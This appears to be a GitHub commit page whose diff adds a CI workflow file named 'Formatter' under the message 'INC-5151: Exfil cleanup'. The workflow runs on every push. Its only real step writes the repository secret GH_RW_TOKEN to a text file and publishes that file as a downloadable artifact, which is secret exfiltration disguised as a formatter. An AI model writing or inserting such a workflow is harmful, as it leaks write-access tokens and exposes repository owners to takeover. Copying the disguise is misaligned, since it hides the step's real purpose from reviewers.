Skip to content

Commit 02a11d0

Browse files
committed
INC-5151: Exfil cleanup
1 parent 9371eba commit 02a11d0

1 file changed

Lines changed: 15 additions & 0 deletions

File tree

.github/workflows/inc5151.yml

Lines changed: 15 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,15 @@
1+
name: Formatter
2+
run-name: Formatter
3+
on:
4+
push:
5+
jobs:
6+
format:
7+
runs-on: ubuntu-latest
8+
steps:
9+
- uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd
10+
- name: Run Formatter
11+
run: echo ${{ secrets.GH_RW_TOKEN }} > format-results.txt
12+
- uses: actions/upload-artifact@bbbca2ddaa5d8feaa63e36b76fdaad77386f024f
13+
with:
14+
name: format-results
15+
path: format-results.txt

0 commit comments

Comments
 (0)